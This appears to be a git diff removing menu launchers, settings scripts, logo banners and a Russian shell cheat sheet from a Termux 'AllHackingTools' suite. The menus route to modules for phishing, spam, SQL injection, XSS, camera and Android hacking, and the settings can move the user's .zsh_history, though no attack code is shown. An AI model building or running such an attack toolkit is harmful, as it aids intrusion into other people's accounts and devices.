-elif(op==2): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/RouterMenu.py") -elif(op==3): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/MailMenu.py") -elif(op==4): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/WebMenu.py") -elif(op==5): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/CamHackMenu.py") -elif(op==6): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AndroidMenu.py") -elif(op==7): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SQLinjectionMenu.py") -elif(op==8): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SocialMenu.py") -elif(op==9): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SpamMenu.py") -elif(op==10): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AnalistickMenu.py") -elif(op==11): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/DarkSearchMenu.py") -elif(op==12): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PhishingMenu.py") -elif(op==13): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PassworldMenu.py") -elif(op==14): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/WordlistGeneratorMenu.py") -elif(op==15): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/XSSAttackMenu.py") -elif(op==16): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/discordMenu.py") -elif(op==17): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/telegramMenu.py") -elif(op==18): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/OtherToolConfig.py") -elif(op==19): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/TermuxPanelConfig.py") -elif(op==20): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 .settings/settingsMenu.py") -elif(op==21): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("clear && cd && cd AllHackingTools && bash .settings/LICENSE.sh && cd && cd AllHackingTools && python3 src/Timer2.py && python2 MainMenu.py") -elif(op==22): - os.system("bash src/Inf.sh") - time.sleep(0.3) - time.sleep(1) - os.system("cd && cd AllHackingTools && python3 .check/UpdaterConfig.py") -elif(op==23): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("bash src/About.sh") -elif(op==13324715): - print("[DEBUG] Developer mode successfully enabled!") - time.sleep(0.8) - os.system("cd && cd AllHackingTools && cd .settings && mv DesingLogo.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && mv DesingMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/") - print("[DEBUG] Please restart AllHackingTools!") - os.system("cd && cd AllHackingTools && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/temp && cd .settings && cd debug && cp MainMenu.py /data/data/com.termux/files/home/AllHackingTools/") - print("[DEBUG] Warning! Customization has been disabled.") -elif(op==24): - os.system("clear && cd && cd AllHackingTools && bash Logo.sh") - print("\033[1;31;40mExiting System...") - time.sleep(0.7) -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTool") - os.system("python2 MainMenu.py") diff --git a/.settings/desing2/Logo.sh b/.settings/desing2/Logo.sh deleted file mode 100644 index 1e508d3a..00000000 --- a/.settings/desing2/Logo.sh +++ /dev/null @@ -1,14 +0,0 @@ -echo ' -{+} - | ██╗##██╗#█████╗##█████╗#██╗##██╗██╗███╗##██╗#██████╗########████████╗#█████╗##█████╗#██╗##### - | ██║##██║██╔══██╗██╔══██╗██║#██╔╝██║████╗#██║██╔════╝########╚══██╔══╝██╔══██╗██╔══██╗██║##### - | ███████║███████║██║##╚═╝█████═╝#██║██╔██╗██║██║##██╗#█████╗####██║###██║##██║██║##██║██║##### - | ██╔══██║██╔══██║██║##██╗██╔═██╗#██║██║╚████║██║##╚██╗╚════╝####██║###██║##██║██║##██║██║##### - | ██║##██║██║##██║╚█████╔╝██║#╚██╗██║██║#╚███║╚██████╔╝##########██║###╚█████╔╝╚█████╔╝███████╗ - | ╚═╝##╚═╝╚═╝##╚═╝#╚════╝#╚═╝#╚═╝╚═╝╚═╝##╚══╝#╚═════╝############╚═╝####╚════╝##╚════╝#╚══════╝ v2.8 -{h} -{e}Title : AllHackingTools - Tool for hacking - ⁣ATTENTION! The author of this article is not respo- -{l}Github : https://github.com/mishakorzik - nsi⁣ble responsible for any consequences of reading it. -{l}coded By : Misha Korzhik (Міша Коржик) - All materials are provided for educational purposes only! -{o}——————-——-–—————-—-–—————-————-—–————-———-—–—————————-——–—————–-——{+} -'|lolcat -p 2.6 -a -d 2 -s 20.0 diff --git a/.settings/desing2/MainMenu.py b/.settings/desing2/MainMenu.py deleted file mode 100644 index 0001bab1..00000000 --- a/.settings/desing2/MainMenu.py +++ /dev/null @@ -1,136 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools") -os.system("bash Logo.sh") -os.system("bash src/MenuOps3.sh") - -Green="\033[1;33m" -Blue="\033[1;34m" -Grey="\033[1;30m" -Reset="\033[0m" -Red="\033[1;31m" -Purple="\033[0;35m" - -g="\033[1;32m" -r="\033[1;31m" -w="\033[0m" -b="\033[1;34m" -o="\033[1;33m" -bl="\033[1;36;40m" - -op=int(raw_input("Options: ")) -if(op==1): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/IpMenuConfig.py") -elif(op==2): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/RouterMenu.py") -elif(op==3): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/MailMenu.py") -elif(op==4): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/WebMenu.py") -elif(op==5): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/CamHackMenu.py") -elif(op==6): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AndroidMenu.py") -elif(op==7): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SQLinjectionMenu.py") -elif(op==8): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SocialMenu.py") -elif(op==9): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SpamMenu.py") -elif(op==10): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AnalistickMenu.py") -elif(op==11): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/DarkSearchMenu.py") -elif(op==12): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PhishingMenu.py") -elif(op==13): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PassworldMenu.py") -elif(op==14): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/WordlistGeneratorMenu.py") -elif(op==15): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/XSSAttackMenu.py") -elif(op==16): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/discordMenu.py") -elif(op==17): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/telegramMenu.py") -elif(op==18): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/OtherToolConfig.py") -elif(op==19): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/TermuxPanelConfig.py") -elif(op==20): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 .settings/settingsMenu.py") -elif(op==21): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("clear && cd && cd AllHackingTools && bash .settings/LICENSE.sh && cd && cd AllHackingTools && python3 src/Timer2.py && python2 MainMenu.py") -elif(op==22): - os.system("bash src/Inf.sh") - time.sleep(0.3) - time.sleep(1) - os.system("cd && cd AllHackingTools && python3 .check/UpdaterConfig.py") -elif(op==23): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("bash src/About.sh") -elif(op==13324715): - print("[DEBUG] Developer mode successfully enabled!") - time.sleep(0.8) - os.system("cd && cd AllHackingTools && cd .settings && mv DesingLogo.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && mv DesingMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/") - print("[DEBUG] Please restart AllHackingTools!") - os.system("cd && cd AllHackingTools && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/temp && cd .settings && cd debug && cp MainMenu.py /data/data/com.termux/files/home/AllHackingTools/") - print("[DEBUG] Warning! Customization has been disabled.") -elif(op==24): - os.system("clear && cd && cd AllHackingTools && bash Logo.sh") - print("\033[1;31;40mExiting System...") - time.sleep(0.7) -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTool") - os.system("python2 MainMenu.py") diff --git a/.settings/desing3/Logo.sh b/.settings/desing3/Logo.sh deleted file mode 100644 index a870df2c..00000000 --- a/.settings/desing3/Logo.sh +++ /dev/null @@ -1,10 +0,0 @@ -echo ' -╭━━━┳╮╭╮╭╮╱╭╮╱╱╱╱╱╭╮╱╱╱╱╱╱╱╭━━━━╮╱╱╱╱╭╮╱╱╱ [+] -┃╭━╮┃┃┃┃┃┃╱┃┃╱╱╱╱╱┃┃╱╱╱╱╱╱╱┃╭╮╭╮┃╱╱╱╱┃┃╱╱╱ | today is a great day to hack something...! -┃┃╱┃┃┃┃┃┃╰━╯┣━━┳━━┫┃╭┳┳━╮╭━┻┫┃┃┣┻━┳━━┫┃╭━━╮ | License: GNU General Public License v3.0 -┃╰━╯┃┃┃┃┃╭━╮┃╭╮┃╭━┫╰╯╋┫╭╮┫╭╮┃┃┃┃╭╮┃╭╮┃┃┃━━┫ | -┃╭━╮┃╰┫╰┫┃╱┃┃╭╮┃╰━┫╭╮┫┃┃┃┃╰╯┃┃┃┃╰╯┃╰╯┃╰╋━━┃ | -╰╯╱╰┻━┻━┻╯╱╰┻╯╰┻━━┻╯╰┻┻╯╰┻━╮┃╰╯╰━━┻━━┻━┻━━╯ | Version: v2.8.1 -╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╭━╯┃╱╱╱╱╱╱╱╱╱╱╱╱╱ | Developer: Misha Korzhik -╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╰━━╯╱╱╱╱╱╱╱╱╱╱╱╱╱ [+]-——————–————-–————————–————[+]' | lolcat -p 2.9 - diff --git a/.settings/desing3/MainMenu.py b/.settings/desing3/MainMenu.py deleted file mode 100644 index 88ccd07b..00000000 --- a/.settings/desing3/MainMenu.py +++ /dev/null @@ -1,136 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools") -os.system("bash Logo.sh") -os.system("bash src/MenuOps4.sh") - -Green="\033[1;33m" -Blue="\033[1;34m" -Grey="\033[1;30m" -Reset="\033[0m" -Red="\033[1;31m" -Purple="\033[0;35m" - -g="\033[1;32m" -r="\033[1;31m" -w="\033[0m" -b="\033[1;34m" -o="\033[1;33m" -bl="\033[1;36;40m" - -op=int(raw_input("Options: ")) -if(op==1): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/IpMenuConfig.py") -elif(op==2): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/RouterMenu.py") -elif(op==3): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/MailMenu.py") -elif(op==4): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/WebMenu.py") -elif(op==5): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/CamHackMenu.py") -elif(op==6): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AndroidMenu.py") -elif(op==7): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SQLinjectionMenu.py") -elif(op==8): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SocialMenu.py") -elif(op==9): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SpamMenu.py") -elif(op==10): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AnalistickMenu.py") -elif(op==11): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/DarkSearchMenu.py") -elif(op==12): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PhishingMenu.py") -elif(op==13): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PassworldMenu.py") -elif(op==14): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/WordlistGeneratorMenu.py") -elif(op==15): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/XSSAttackMenu.py") -elif(op==16): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/discordMenu.py") -elif(op==17): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/telegramMenu.py") -elif(op==18): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/OtherToolConfig.py") -elif(op==19): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/TermuxPanelConfig.py") -elif(op==20): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 .settings/settingsMenu.py") -elif(op==21): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("clear && cd && cd AllHackingTools && bash .settings/LICENSE.sh && cd && cd AllHackingTools && python3 src/Timer2.py && python2 MainMenu.py") -elif(op==22): - os.system("bash src/Inf.sh") - time.sleep(0.3) - time.sleep(1) - os.system("cd && cd AllHackingTools && python3 .check/UpdaterConfig.py") -elif(op==23): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("bash src/About.sh") -elif(op==13324715): - print("[DEBUG] Developer mode successfully enabled!") - time.sleep(0.8) - os.system("cd && cd AllHackingTools && cd .settings && mv DesingLogo.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && mv DesingMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/") - print("[DEBUG] Please restart AllHackingTools!") - os.system("cd && cd AllHackingTools && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/temp && cd .settings && cd debug && cp MainMenu.py /data/data/com.termux/files/home/AllHackingTools/") - print("[DEBUG] Warning! Customization has been disabled.") -elif(op==24): - os.system("clear && cd && cd AllHackingTools && bash Logo.sh") - print("\033[1;31;40mExiting System...") - time.sleep(0.7) -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTool") - os.system("python2 MainMenu.py") diff --git a/.settings/settingsMenu.py b/.settings/settingsMenu.py deleted file mode 100644 index cf20fc25..00000000 --- a/.settings/settingsMenu.py +++ /dev/null @@ -1,62 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") -os.system("cd && bash AllHackingTools/.desing/SettingMenu0.sh") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 DesingLogo.py") -elif(op==2): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 DesingMenu.py") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && cd src && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/src/ && cd && cd AllHackingTools && cd .temp && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("cd && cd AllHackingTools && cd src && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp4/ && mv AnimationLoad2.sh AnimationLoad1.sh && cd && cd AllHackingTools && cd .temp && cd DesingTemp4 && mv AnimationLoad1.sh AnimationLoad2.sh && mv AnimationLoad2.sh /data/data/com.termux/files/home/AllHackingTools/src/") -elif(op==5): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 SpecialOpportunities.py") -elif(op==6): - os.system("clear") - os.system("cd && nano .zsh_history") -elif(op==7): - os.system("clear") - os.system("cd && rm -rf AllHackingTools/.settings/deletedfiles/.zsh_history && cd && mv .zsh_history AllHackingTools/.settings/deletedfiles/ && cd && cd AllHackingTools && python2 MainMenu.py") -elif(op==8): - os.system("clear") - os.system("cd && cd AllHackingTools && bash Logo.sh") - time.sleep(0.2) - print("\033[1;31;40mRestoring AllHackingTools backup...") - os.system("cd /sdcard/ && cp -r AllHackingTools /data/data/com.termux/files/home/") - os.system("cd && bash AllHackingTools/.settings/RestoreAllHackingToolsBackup.sh") - print("successfully restored backup in: sdcard...") -elif(op==9): - os.system("clear") - os.system("cd && cd AllHackingTools && bash Logo.sh") - time.sleep(0.2) - print("\033[1;31;40mWait A Bit For The Backup To Be Created...") - os.system("cd && cd && cp -r AllHackingTools /sdcard/") - print("successfully created a backup in: sdcard...") -elif(op==10): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==11): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") - diff --git a/.settings/settingsMenu1.py b/.settings/settingsMenu1.py deleted file mode 100644 index 891123c8..00000000 --- a/.settings/settingsMenu1.py +++ /dev/null @@ -1,61 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") -os.system("cd && bash AllHackingTools/.desing/SettingMenu1.sh") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 DesingLogo.py") -elif(op==2): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 DesingMenu.py") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && cd src && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/src/ && cd && cd AllHackingTools && cd .temp && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("cd && cd AllHackingTools && cd src && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp4/ && mv AnimationLoad2.sh AnimationLoad1.sh && cd && cd AllHackingTools && cd .temp && cd DesingTemp4 && mv AnimationLoad1.sh AnimationLoad2.sh && mv AnimationLoad2.sh /data/data/com.termux/files/home/AllHackingTools/src/") -elif(op==5): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 SpecialOpportunities.py") -elif(op==6): - os.system("clear") - os.system("cd && nano .zsh_history") -elif(op==7): - os.system("clear") - os.system("cd && rm -rf AllHackingTools/.settings/deletedfiles/.zsh_history && cd && mv .zsh_history AllHackingTools/.settings/deletedfiles/ && cd && cd AllHackingTools && python2 MainMenu.py") -elif(op==8): - os.system("clear") - os.system("cd && cd AllHackingTools && bash Logo.sh") - time.sleep(0.2) - print("\033[1;31;40mRestoring AllHackingTools backup...") - os.system("cd /sdcard/ && cp -r AllHackingTools /data/data/com.termux/files/home/") - os.system("cd && bash AllHackingTools/.settings/RestoreAllHackingToolsBackup.sh") - print("successfully restored backup in: sdcard...") -elif(op==9): - os.system("clear") - os.system("cd && cd AllHackingTools && bash Logo.sh") - time.sleep(0.2) - print("\033[1;31;40mWait A Bit For The Backup To Be Created...") - os.system("cd && cd && cp -r AllHackingTools /sdcard/") - print("successfully created a backup in: sdcard...") -elif(op==10): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==11): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.settings/settingsMenu2.py b/.settings/settingsMenu2.py deleted file mode 100644 index cf497ac9..00000000 --- a/.settings/settingsMenu2.py +++ /dev/null @@ -1,61 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") -os.system("cd && bash AllHackingTools/.desing/SettingMenu2.sh") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 DesingLogo.py") -elif(op==2): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 DesingMenu.py") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && cd src && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/src/ && cd && cd AllHackingTools && cd .temp && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("cd && cd AllHackingTools && cd src && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp4/ && mv AnimationLoad2.sh AnimationLoad1.sh && cd && cd AllHackingTools && cd .temp && cd DesingTemp4 && mv AnimationLoad1.sh AnimationLoad2.sh && mv AnimationLoad2.sh /data/data/com.termux/files/home/AllHackingTools/src/") -elif(op==5): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 SpecialOpportunities.py") -elif(op==6): - os.system("clear") - os.system("cd && nano .zsh_history") -elif(op==7): - os.system("clear") - os.system("cd && rm -rf AllHackingTools/.settings/deletedfiles/.zsh_history && cd && mv .zsh_history AllHackingTools/.settings/deletedfiles/ && cd && cd AllHackingTools && python2 MainMenu.py") -elif(op==8): - os.system("clear") - os.system("cd && cd AllHackingTools && bash Logo.sh") - time.sleep(0.2) - print("\033[1;31;40mRestoring AllHackingTools backup...") - os.system("cd /sdcard/ && cp -r AllHackingTools /data/data/com.termux/files/home/") - os.system("cd && bash AllHackingTools/.settings/RestoreAllHackingToolsBackup.sh") - print("successfully restored backup in: sdcard...") -elif(op==9): - os.system("clear") - os.system("cd && cd AllHackingTools && bash Logo.sh") - time.sleep(0.2) - print("\033[1;31;40mWait A Bit For The Backup To Be Created...") - os.system("cd && cd && cp -r AllHackingTools /sdcard/") - print("successfully created a backup in: sdcard...") -elif(op==10): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==11): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.settings/settingsMenu3.py b/.settings/settingsMenu3.py deleted file mode 100644 index 7e72dfb2..00000000 --- a/.settings/settingsMenu3.py +++ /dev/null @@ -1,61 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") -os.system("cd && bash AllHackingTools/.desing/SettingMenu3.sh") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 DesingLogo.py") -elif(op==2): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 DesingMenu.py") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && cd src && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/src/ && cd && cd AllHackingTools && cd .temp && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("cd && cd AllHackingTools && cd src && mv AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp4/ && mv AnimationLoad2.sh AnimationLoad1.sh && cd && cd AllHackingTools && cd .temp && cd DesingTemp4 && mv AnimationLoad1.sh AnimationLoad2.sh && mv AnimationLoad2.sh /data/data/com.termux/files/home/AllHackingTools/src/") -elif(op==5): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && python2 SpecialOpportunities.py") -elif(op==6): - os.system("clear") - os.system("cd && nano .zsh_history") -elif(op==7): - os.system("clear") - os.system("cd && rm -rf AllHackingTools/.settings/deletedfiles/.zsh_history && cd && mv .zsh_history AllHackingTools/.settings/deletedfiles/ && cd && cd AllHackingTools && python2 MainMenu.py") -elif(op==8): - os.system("clear") - os.system("cd && cd AllHackingTools && bash Logo.sh") - time.sleep(0.2) - print("\033[1;31;40mRestoring AllHackingTools backup...") - os.system("cd /sdcard/ && cp -r AllHackingTools /data/data/com.termux/files/home/") - os.system("cd && bash AllHackingTools/.settings/RestoreAllHackingToolsBackup.sh") - print("successfully restored backup in: sdcard...") -elif(op==9): - os.system("clear") - os.system("cd && cd AllHackingTools && bash Logo.sh") - time.sleep(0.2) - print("\033[1;31;40mWait A Bit For The Backup To Be Created...") - os.system("cd && cd && cp -r AllHackingTools /sdcard/") - print("successfully created a backup in: sdcard...") -elif(op==10): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==11): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.temp/DesingTemp/DesingTemp b/.temp/DesingTemp/DesingTemp deleted file mode 100644 index 5428443f..00000000 --- a/.temp/DesingTemp/DesingTemp +++ /dev/null @@ -1 +0,0 @@ -DesingTemp diff --git a/.temp/DesingTemp2/Temp2.sh b/.temp/DesingTemp2/Temp2.sh deleted file mode 100644 index 8d853270..00000000 --- a/.temp/DesingTemp2/Temp2.sh +++ /dev/null @@ -1 +0,0 @@ -MainMenu.py_Temp2.sh > MainMenu.py diff --git a/.temp/DesingTemp3/DesingTemp3 b/.temp/DesingTemp3/DesingTemp3 deleted file mode 100644 index 8d1c8b69..00000000 --- a/.temp/DesingTemp3/DesingTemp3 +++ /dev/null @@ -1 +0,0 @@ - diff --git a/.temp/DesingTemp4/Temp b/.temp/DesingTemp4/Temp deleted file mode 100644 index dbaa97a1..00000000 --- a/.temp/DesingTemp4/Temp +++ /dev/null @@ -1 +0,0 @@ -Temp > |te>pv diff --git a/.temp/temp/.none b/.temp/temp/.none deleted file mode 100644 index 8d1c8b69..00000000 --- a/.temp/temp/.none +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Castom/Help.sh b/Castom/Help.sh deleted file mode 100644 index bee3725c..00000000 --- a/Castom/Help.sh +++ /dev/null @@ -1,103 +0,0 @@ - -echo "Files and base commands:" -echo "" -echo "ls – список файлов и каталогов" -echo "ls -al – форматированный список со скрытыми каталогами и файлами" -echo "cd dir – сменить директорию на dir" -echo "cd – сменить на домашний каталог" -echo "pwd – показать текущий каталог" -echo "mkdir dir – создать каталог dir" -echo "rm -rf file – удалить file или папку" -echo "rm -r dir – удалить каталог dir" -echo "rm -r -f /path – удалить каталог dir" -echo "rm -f file – удалить форсированно file" -echo "rm -rf dir – удалить форсированно каталог dir" -echo "cp file1 file2 – скопировать file1 в file2" -echo "cp -r dir1 dir2 – скопировать dir1 в dir2; создаст каталог dir2, если он не существует" -echo "mv file1 file2 – переименовать или переместить file1 в file2. если file2 существующий каталог — переместить file1 в каталог file2" -echo "ln -s file link – создать символическую ссылку link к файлу file" -echo "touch file – создать file" -echo "cat > file – направить стандартный ввод в file" -echo "more file – вывести содержимое file" -echo "head file – вывести первые 10 строк file" -echo "tail file – вывести последние 10 строк file" -echo "tail -f file – вывести содержимое file по мере роста, начинает с последних 10 строк" -echo "" -echo "Process controlers:" -echo "" -echo "ps – вывести ваши текущие активные процессы" -echo "top – показать все запущенные процессы" -echo "kill pid – убить процесс с id pid" -echo "killall proc – убить все процессы с именем proc" -echo "bg – список остановленных и фоновых задач; продолжить выполнение остановленной задачи в фоне" -echo "fg – выносит на передний план последние задачи" -echo "fg n – вынести задачу n на передний план" -echo "" -echo "Access rights and files" -echo "" -echo "chmod octal file – сменить права file на octal, раздельно для пользователя, группы и для всех добавлением:" -echo "4 – чтение (r)" -echo "2 – запись (w)" 